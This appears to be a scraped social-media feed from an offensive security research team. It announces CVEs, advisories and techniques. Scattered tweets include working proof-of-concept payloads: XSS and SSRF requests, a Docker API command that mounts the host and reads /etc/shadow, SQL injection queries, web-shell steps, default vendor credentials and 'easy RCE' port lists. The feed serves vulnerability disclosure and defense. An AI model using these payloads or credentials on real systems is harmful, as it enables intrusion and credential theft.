PT SWARM

@ptswarm

17,248
Followers
143
Following
133
Media
193
Statuses

Positive Technologies Offensive Team

Joined July 2020
@ptswarm
PT SWARM
4 years
New attack! Our researcher Arseniy Sharoglazov has discovered a method to connect to LDAP via #MSExchange from the Internet and access the whole Active Directory database. Read the research:
10
658
1K
@ptswarm
PT SWARM
4 years
We found an Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned. The PoC ⬇️
16
476
1K
@ptswarm
PT SWARM
4 years
💥Easy RCE Ports Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999 WebLogic: 7000-7004,8000-8003,9000-9003,9503,7070,7071 JDWP: 45000,45001 JMX: 8686,9012,50500 GlassFish: 4848 jBoss: 11111,4444,4445 Cisco Smart Install: 4786 HP Data Protector: 5555,5556 #ptswarmTechniques
9
427
1K
@ptswarm
PT SWARM
4 years
New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars! 💥 XXE WAF Bypass 💥 Works when there is no XXE, but there is a vuln in the XML body, e.g. SQL Injection #ptswarmTechniques
7
382
908
@ptswarm
PT SWARM
4 years
⚡️New DNS Out-of-Band vector for MSSQL Injections in SELECT statement! Can be used for completely blind #sqli . Use fn_trace_gettable and #Burp Collaborator👍. #ptswarmTechniques
6
376
908
@ptswarm
PT SWARM
3 years
💥VMware fixed an Unauth RCE in vCenter (CVE-2021-21972) found by our researcher Mikhail Klyuchnikov. CVSS: 9.8 🔥 Advisory:
19
379
896
@ptswarm
PT SWARM
2 years
🔥 We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP. Successful exploitation could lead to RCE from an unauthenticated user. Patch ASAP!
18
270
792
@ptswarm
PT SWARM
3 years
Since the PoC for the VMware vCenter RCE (CVE-2021-21972) is now readily available, we're publishing our article covering all of the technical details. Read the article:
6
435
775
@ptswarm
PT SWARM
3 years
🔥 We have reproduced the fresh CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49. If files outside of the document root are not protected by "require all denied" these requests can succeed. Patch ASAP!
16
379
747
@ptswarm
PT SWARM
4 years
➡️Default creds for #redteam Cisco: cisco:cisco Citrix: nsroot:nsroot Dell iDRAC: root:calvin Juniper: super:juniper123 pfSense: admin:pfsense SAP: SAP*:06071992 Tomcat: tomcat:tomcat UniFi: ubnt:ubnt Weblogic: weblogic:weblogic1 Zabbix: Admin:zabbix #ptswarmTechniques
9
265
751
@ptswarm
PT SWARM
2 years
🔥 A tip for getting RCE in Jetty apps with just one XML file!
7
245
740
@ptswarm
PT SWARM
3 years
💥Easy RCE Ports (part 2) IBM WebSphere: 8880 Apache Hadoop: 8088 Redis: 6379 Docker: 2375 Apache Solr: 8983 Zoho Manageengine Desktop: 8383 Atlassian Crowd: 4990 Portainer: 9000 Hashicorp Consul: 8500 Apache Spark: 6066 #ptswarmTechniques
4
268
683
@ptswarm
PT SWARM
3 years
🎁PoC for XSS in Cisco ASA (CVE-2020-3580) POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ciscoASA.local Content-Type: application/x-www-form-urlencoded Content-Length: 44 SAMLResponse="><svg/onload=alert('PTSwarm')>
16
284
665
@ptswarm
PT SWARM
2 years
💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE! Read the research:
8
256
638
@ptswarm
PT SWARM
8 months
⚠️ We have reproduced CVE-2023-22515 in Atlassian Confluence. Broken access control allows unauthenticated users to gain administrative access to the web application! Update your software ASAP!
8
171
626
@ptswarm
PT SWARM
4 years
New gadget chain for deserialization in Zend Framework applications. Triggers on __destruct(), gives RCE and works in PHP 7. #ptswarmTechniques
3
222
607
@ptswarm
PT SWARM
2 years
🙀 Our researcher Arseniy Sharoglazov found a new technique for discovering second-level domains! Useful for: 🐞 Bughunters, for discovering vulns on new domains 🐛 Threathunters, for discovering malicious domains 🎃 Everyone else Read the research:
13
250
577
@ptswarm
PT SWARM
4 years
Kerberoasting without SPNs! Read the research by Arseniy Sharoglazov:
6
295
563
@ptswarm
PT SWARM
2 years
🔥 We have reproduced the fresh CVE-2022-22954 Server-Side Template Injection in VMware Workspace ONE Access. Successful exploitation could lead to RCE from an unauthenticated user. Patch ASAP!
7
207
554
@ptswarm
PT SWARM
4 years
💉Advanced MSSQL Injection Tricks💉 🩸 New DNS Out-Of-Band vector in SELECT statement 🩸 Quick exploitation: Get all table data in one query 🩸 Read local files in SELECT statement and more! Read the article:
1
260
520
@ptswarm
PT SWARM
3 years
A swarm of FortiWeb CVE-s is here: 1️⃣Unauth SQL Injection (CVE-2020-29015) 2️⃣Unauth Buffer Overflow (CVE-2020-29016) 3️⃣Unauth Buffer Overflow (CVE-2020-29019) 4️⃣Format String (CVE-2020-29018) Attributed to: Andrey Medov Advisories:
5
236
517
@ptswarm
PT SWARM
3 years
💥Easy RCE using Docker API on port 2375/tcp docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/shadow RCE: chroot /mnt #ptswarmTechniques
4
163
512
@ptswarm
PT SWARM
4 years
Read this article about CVE-2019-19781 RCE in Citrix by its author, Mikhail Klyuchnikov:
4
251
507
@ptswarm
PT SWARM
2 years
✅ A Tip for SQL Injection WAF Bypass
1
147
497
@ptswarm
PT SWARM
3 years
🚨RCE on a backend IIS server via file upload with an atypical file extension. 📋More community curated payloads can be found at #tipstoknow
2
190
490
@ptswarm
PT SWARM
2 years
😎 F5 BIG-IP RCE (CVE-2022-1388). How does it work?
3
186
484
@ptswarm
PT SWARM
3 months
🎁 Source Code Disclosure in IIS 10.0! Almost. There is a method to reveal the source code of some .NET apps. Here's how it works. 👉
3
186
477
@ptswarm
PT SWARM
1 year
🧙‍♂️ CVE-2022-44268 - a vulnerability in ImageMagick that could lead to an arbitrary file read. How does it work? See here 👇
4
131
462
@ptswarm
PT SWARM
4 years
We have reproduced the CVE-2020-1472 #zerologon vulnerability! It's an unauth RCE for Domain Controllers.
4
204
459
@ptswarm
PT SWARM
3 years
Open redirect parameters from every disclosed @Hacker0x01 report ever, composed in one wordlist The full list (48 unique): Top 5 sorted by popularity 👇 #ptswarmTechniques
6
173
458
@ptswarm
PT SWARM
2 years
🔥 Veeam fixed an Unauth RCE (CVE-2022-26500, CVE-2022-26501) in Veeam Backup & Replication and a Local Privilege Escalation (CVE-2022-26503) in Veeam Agent for Microsoft Windows found by our researcher @ultrayoba . Advisory:
7
184
449
@ptswarm
PT SWARM
7 days
🧧 Our researcher Igor Sak-Sakovskiy has discovered an XXE in Chrome and Safari by ChatGPT! Bounty: $28,000 💸 Here is the write-up 👉
10
176
558
@ptswarm
PT SWARM
2 years
💥 We have reproduced CVE-2022-31626, an RCE in PHP <= 7.4.29 which can be triggered via a rogue MySQL/MariaDB server! It's a Heap Overflow, works with MySQLi/PDO, and doesn't require LOAD LOCAL INFILE. The PoC 👉
4
167
413
@ptswarm
PT SWARM
3 years
✅ The way to bypass #XSS WAF in web applications. #tipstoknow
3
131
402
@ptswarm
PT SWARM
4 years
Very fast exploitation of #sqli in #MySQL >= 5.7.22 using the 'json_arrayagg()' function. SELECT json_arrayagg(concat_ws(0x3a,table_schema,table_name)) from INFORMATION_SCHEMA.TABLES; ❌group_concat() = 1024 symbols 👍json_arrayagg() > 16,000,000 symbols #ptswarmTechniques
3
169
398
@ptswarm
PT SWARM
4 years
Atlassian Jira unauthenticated user enumeration (CVE-2020-14181)! Versions affected: Jira < 7.13.6 8.0.0 ≤ Jira < 8.5.7 8.6.0 ≤ Jira < 8.12.0 Discovered by Mikhail Klyuchnikov. Advisory: /secure/ViewUserHover.jspa?username=test The PoC ☝️
3
168
394
@ptswarm
PT SWARM
2 years
🐞 PoC for a Post-Auth RCE (CVE-2021-38163) in SAP NetWeaver. The vulnerability was found by our researcher Mikhail Klyuchnikov. Reproduction steps: 1. Upload a jsp shell using the /irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.VCParMigrator path 2. Execute OS commands
2
158
380
@ptswarm
PT SWARM
8 months
🔥 We have reproduced the fresh CVE-2023-42793 in JetBrains TeamCity. Authentication bypass allows an external attacker to gain administrative access to the server and execute any commands on it. Update your software ASAP!
6
85
367
@ptswarm
PT SWARM
3 years
#Pentest pivoting cheat sheet for #redteam
3
122
366
@ptswarm
PT SWARM
3 years
Atlassian Jira Unauth User Enumeration (CVE-2020-36289) discovered by our researcher Mikhail Klyuchnikov. Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1 PoC: /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin Advisory:
5
128
357
@ptswarm
PT SWARM
2 years
🔥 We have reproduced the fresh CVE-2022-24086 Improper Input Validation vulnerability in Magento Open Source and Adobe Commerce. Successful exploitation could lead to RCE from an unauthenticated user.
9
123
353
@ptswarm
PT SWARM
4 years
💥New article "Path Traversal on Citrix XenMobile Server" with a step-by-step guide to disclosing encryption keys, decrypting passwords, and thoroughly understanding CVE-2020-8209 by our researcher Andrey Medov. Read all about it: The PoC⬇️
1
170
354
@ptswarm
PT SWARM
3 years
🐞PoC for a boolean-based #SQLi in Rapid7 Nexpose <= 6.6.48 (CVE-2020-7383) https://nexpose.local:3780/data/discoveryAsset/config/folderPath?path=[sqli]
1
133
341
@ptswarm
PT SWARM
8 months
💥 We have reproduced both CVE-2023-29357 and CVE-2023-24955 in Microsoft SharePoint. The chain allows unauthenticated users to execute arbitrary commands on the server. Update your software ASAP!
3
108
339
@ptswarm
PT SWARM
2 years
🥳 We have reproduced an Arbitrary File Read for an internal site of Skype for Business / MS Lync! CVE: CVE-2022-26911 Subdomains: dialin, meet, lyncdiscover, sip, ... Original advisory: The PoC ⤵️
3
120
339
@ptswarm
PT SWARM
2 months
🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well! A brief instruction for red teams: 1. Compile our enhanced DLL 👉 2. Use NetSPI's ruler and wait! No back connect required! 🔥 📐📏
4
130
342
@ptswarm
PT SWARM
4 years
New article by Mikhail Klyuchnikov: RCE in F5 Big-IP (CVE-2020-5902)
4
163
330
@ptswarm
PT SWARM
4 months
💥 We have reproduced CVE-2023-22527 in Atlassian Confluence. A template injection vulnerability allows an unauthenticated attacker to achieve RCE on an affected instance. Update your software ASAP!
5
91
332
@ptswarm
PT SWARM
3 years
4 XSS in FortiWeb (CVE-2021-22122), found by Andrey Medov, have been patched. Two example PoCs: 1⃣ /error3?msg=30&data=';alert('xss');// 2⃣ /omni_success?cmdb_edit_path=");alert('xss');// Advisory:
2
112
293
@ptswarm
PT SWARM
1 year
🍃 Are you stuck on authorization bypass in a Spring app? This tip can be helpful to you!
2
87
294
@ptswarm
PT SWARM
4 years
We are releasing an article about an Authenticated Arbitrary File Read vulnerability (CVE-2019-19499) in Grafana! Dive into Go SQL client libraries, quirks of the MySQL protocol, and more!
2
119
291
@ptswarm
PT SWARM
3 years
🏆Top 10 parameters for SSRF from disclosed @Hacker0x01 reports and public writeups #ptswarmTechniques
0
103
288
@ptswarm
PT SWARM
3 years
We are proud to announce that "Attacking MS Exchange Web Interfaces" by Arseniy Sharoglazov was voted into the "Top 10 web hacking techniques of 2020"! Our sincere gratitude goes out to the community and the @PortSwiggerRes panel. Read the research:
0
99
286
@ptswarm
PT SWARM
2 years
🦥 Everyone learned to run pip install colorama to exploit Atlassian Confluence RCE (CVE-2022-26134), so let’s see how the vulnerability works under the hood. Here we show our simplified payload which demonstrates a workflow inside the vulnerable code ⤵️
1
90
270
@ptswarm
PT SWARM
3 years
New article "From 0 to RCE: Cockpit CMS" by our researcher Nikita Petrov. The story of discovering an unauth NoSQL injection and abusing it to retrieve admin hashes, change passwords, and execute commands!
2
123
270
@ptswarm
PT SWARM
3 years
✍️We would like to share with the community some uncommon but not unique cases from our experience. Let us know if you like this format. ✅Stored XSS using .xbl files.
3
108
268
@ptswarm
PT SWARM
3 years
🙈🙉🙊Citrix has removed the acknowledgement of our researcher Mikhail Klyuchnikov who discovered and reported CVE-2019-19781 - the Citrix ADC RCE! @Citrix we will be pleased to hear your response. Current: Mar 2021:
22
105
266
@ptswarm
PT SWARM
3 years
🔥New article: "Swarm of Palo Alto PAN-OS vulnerabilities". Two RCEs and other bugs found by our researchers Mikhail Klyuchnikov & Nikita Abramov. Full analysis 👆
0
136
263
@ptswarm
PT SWARM
4 years
OpenFire allows to get Arbitrary File Read and Unauthenticated Full Read SSRF via its 9090/http and 9091/https ports. The details are in the article by Alexandr Shvetsov (CVE-2019-18393 & CVE-2019-18394):
3
112
254
@ptswarm
PT SWARM
3 years
New article: "Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings" Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers @Ankorik & @__mn1__ :
0
118
257
@ptswarm
PT SWARM
4 years
A swarm of Palo Alto PAN-OS CVE-s is here: 1⃣ Post-Auth RCE (CVE-2020-2037) 2⃣ Post-Auth RCE (CVE-2020-2038) 3⃣ Unauth DoS (CVE-2020-2039) 4⃣ Cross-Site Scripting (CVE-2020-2036) Attributed to: Mikhail Klyuchnikov & Nikita Abramov Advisory:
0
146
253
@ptswarm
PT SWARM
2 years
🎁 PoC for a Post-Auth SQL-Injection (CVE-2022-0757) in Nexpose Vulnerability Scanner <= 6.6.128 Default port: 3780 Default username: nxadmin Affected handler: /data/asset/filterAssets Full Request ⤵️
0
91
249
@ptswarm
PT SWARM
3 years
VMware fixed CVE-2021-21975 and CVE-2021-21983, which when chained together lead to an unauth RCE in vRealize Operations. The vulnerabilities were found by our researcher Egor Dimitrenko. Advisory:
3
98
246
@ptswarm
PT SWARM
3 years
⚠️ Zoom fixed two post-auth RCE (CVE-2021-34416, CVE-2021-34414) and remote system crash (CVE-2021-34415) in Zoom on-premise Meeting Connector found by our researchers Nikita Abramov and Egor Dimitrenko. Advisory:
2
83
245
@ptswarm
PT SWARM
3 years
📲 We are pleased to present the utility developed by our researcher @lmpact_l for Flutter apps traffic monitoring. Just make app trust installed certificates by repacking it with reFlutter and hunt bugs using Burp Suite. No root, no VPN, no more hassle!
6
84
242
@ptswarm
PT SWARM
3 years
✅ Site-wide CSRF using the GraphQL API #tipstoknow
2
92
243
@ptswarm
PT SWARM
2 years
✅ A tip for obtaining NT hash from GenericWrite/All privileges. Works for both user and machine accounts.
6
83
243
@ptswarm
PT SWARM
3 years
💥Fortinet fixed a Post-Auth RCE in FortiWeb (CVE-2021-22123) found by our researcher Andrey Medov. This vulnerability was part of an Unauth RCE chain submitted together with CVE-2020-29015 (Unauth SQL Injection), fixed by Fortinet earlier. Advisory:
1
88
237
@ptswarm
PT SWARM
3 years
VMware fixed an Unauth RCE in View Planner (CVE-2021-21978) found by our researcher Mikhail Klyuchnikov. Advisory:
4
73
233
@ptswarm
PT SWARM
3 years
VMware fixed a Post-Auth RCE in vSphere Replication (CVE-2021-21976) found by our researcher Egor Dimitrenko. Advisory:
0
87
229
@ptswarm
PT SWARM
3 years
✨New Article: Vulnerabilities in McAfee ePolicy Orchestrator 🐞Unauth RCE chain via CSRF + SSRF + MSSQL MiTM server 🐞Post-auth RCE via ZipSlip with Windows Defender bypass 🐞Reflected XSS CVE-2020-7318 assigned, research by Mikhail Klyuchnikov
2
94
229
@ptswarm
PT SWARM
3 years
✨PoC for SSRF in IBM QRadar SIEM (CVE-2020-4786)✨ GET /console/chartServer?output=image&data= http://127.0.0.1:8080
0
89
229
@ptswarm
PT SWARM
2 years
🥷 Useful hotkeys to become @Burp_Suite ninja
4
65
216
@ptswarm
PT SWARM
2 years
🎁 PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [email]a @a .a?[email=a @a .a? onmouseover=alert(1) a]a[/email][/email] Advisory:
3
73
214
@ptswarm
PT SWARM
3 years
New article "How we bypassed bytenode and decompiled Node.js (V8) bytecode in Ghidra" by our researcher Sergey Fedonin.
2
68
193
@ptswarm
PT SWARM
3 years
Cockpit CMS fixed three Unauth NoSQL Injections (CVE-2020-35846, CVE-2020-35847, CVE-2020-35848) found by our researcher Nikita Petrov. These vulnerabilities allow to retrieve an admin's hash or change his password and then execute commands!
3
71
188
@ptswarm
PT SWARM
2 years
💥 New article "Fuzzing for XSS via nested parsers condition" by our researcher @Psych0tr1a . This technique allowed us to find a bunch of vulnerabilities in popular web products that no one had noticed before!
2
81
188
@ptswarm
PT SWARM
4 years
📝New article "RDS Shadowing - Beyond the Shadowed Session" by our researcher Roman Maximov. ✅What Remote Desktop Services Shadowing is and how it works ✅How to shadow a session and remain undetected ✅How to obtain persistence Read the article:
2
88
189
@ptswarm
PT SWARM
4 years
The advisory for multiple unauth RCE in Cisco Integrated Management Controller (CVE-2020-3470) is now out! Buffer Overflows lead to RCE with uid=0 (root) privileges Discovered by Nikita Abramov
1
86
184
@ptswarm
PT SWARM
2 years
😼 You discovered an XSS, but it has no impact? Our mobile hacker @lmpact_l knows the drill 🤑🔽
4
51
191
@ptswarm
PT SWARM
4 years
Rapid7 Nexpose <= 6.6.48 boolean-based #SQLi found by Mikhail Klyuchnikov. "This vulnerability could have allowed an authenticated user with a low permission level to access resources beyond their assigned permissions." - Rapid7 CVE-2020-7383 👉
1
78
184
@ptswarm
PT SWARM
2 years
🔥 The persistent XSS in any message in vBulletin! Patched from 13 Apr 2021. The vulnerability was found by our researcher @Psych0tr1a . PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO] Advisory:
5
74
179
@ptswarm
PT SWARM
4 years
IDA Pro Tips to Add to Your Bag of Tricks, from our researcher Vyacheslav Moskvin. #idapro #idatips
0
86
178
@ptswarm
PT SWARM
3 years
🚨 New article: "WinRAR’s vulnerable trialware: when free software isn’t free" by our researcher @Psych0tr1a . In this article, we show how vulnerabilities in trialware could become a gate for hackers.
1
64
160
@ptswarm
PT SWARM
4 years
The advisory for our CVE-2020-3452 Unauthorized Remote File Reading in Cisco ASA is now out:
2
74
161
@ptswarm
PT SWARM
2 years
⚠️Synacor fixed an Authenticated RCE (CVE-2022-27925) in Zimbra Collaboration Suite found by our researcher Mikhail Klyuchnikov. So far, no advisory, but the patch is available:
4
56
159
@ptswarm
PT SWARM
3 years
RARLAB fixed a MITM (CVE-2021-35052) in WinRAR found by our researcher Igor Sak-Sakovskiy. This attack could be leveraged to achieve command execution on a user's machine. Advisory:
1
72
154
@ptswarm
PT SWARM
2 years
PoC for a stored XSS in (CVE-2021-22886). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [ ]() <; a|Text>th/a
2
36
155
@ptswarm
PT SWARM
3 years
⚡️SAP fixed Post-Auth RCE (CVE-2021-38163) in SAP NetWeaver found by our researcher Mikhail Klyuchnikov. CVSS 9.9 🔥 No credits from @SAP again. Advisory:
3
56
152
@ptswarm
PT SWARM
3 years
Cisco fixed an Unauth DoS (CVE-2021-34704) in Cisco ASA and Cisco FTD found by our researcher Nikita Abramov. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Shodan: 242,070 results 🔥 Advisory:
3
46
151
@ptswarm
PT SWARM
3 years
VMware fixed an Unauth RCE in vRealize Business for Cloud (CVE-2021-21984) found by our researcher Egor Dimitrenko. Advisory:
1
56
152
@ptswarm
PT SWARM
2 years
🐳 Red Hat fixed an Unauth XXE (CVE-2022-2414) in FreeIPA found by our researcher @elk0kc . In some cases, it allows attackers to read the Directory Manager password from the config of FreeIPA and take full control of the infrastructure. Advisory:
2
53
144
@ptswarm
PT SWARM
3 years
SonicWall fixed a Post-Auth RCE (CVE-2021-20026) in Network Security Manager and an Unauth Buffer Overflow (CVE-2021-20027) in SonicOS found by our researcher Nikita Abramov. Advisory:
0
66
140
@ptswarm
PT SWARM
4 years
The advisory for an Unauthenticated Arbitrary File Read vulnerability in Citrix XenMobile (CVE-2020-8209) found by our researcher Andrey Medov is now out! The fixes were released privately 3 weeks ago, so we hope a lot of companies are protected now 🙂
2
78
136
@ptswarm
PT SWARM
3 years
Citrix has restored the acknowledgment of our researchers in its advisories! 🥰 We would like to express our gratitude to the community for your support and making information security more transparent.
1
26
133
@ptswarm
PT SWARM
2 years
🚨 New article by our researchers @__mn1__ and @elk0kc about unauth RCEs in VMware products: "Hunting for bugs in VMware: View Planner and vRealize Business for Cloud". Read the article: This is the first article about our VMware research. More to come!
0
67
132
@ptswarm
PT SWARM
4 years
Checkpoint ICA Management Tool (CVE-2020-6020) research by Mikhail Klyuchnikov & Nikita Abramov. 1⃣Send /etc/shadow to yourself via SMTP 2⃣Simple DoS
2
60
133
@ptswarm
PT SWARM
2 years
⚠️ Rapid7 fixed an SQL-Injection (CVE-2022-0757) and an XSS (CVE-2022-0758) in Nexpose Vulnerability Scanner found by our researcher Aleksey Solovev. Advisory:
0
37
126
@ptswarm
PT SWARM
3 years
⚠️F5 fixes BIG-IP Unauth DoS (CVE-2020-27716) found by our researcher Nikita Abramov. Versions affected: 15.0.0 ≤ BIG-IP(APM) < 15.1.1 BIG-IP(APM) < 14.1.3.1 The advisory:
3
38
125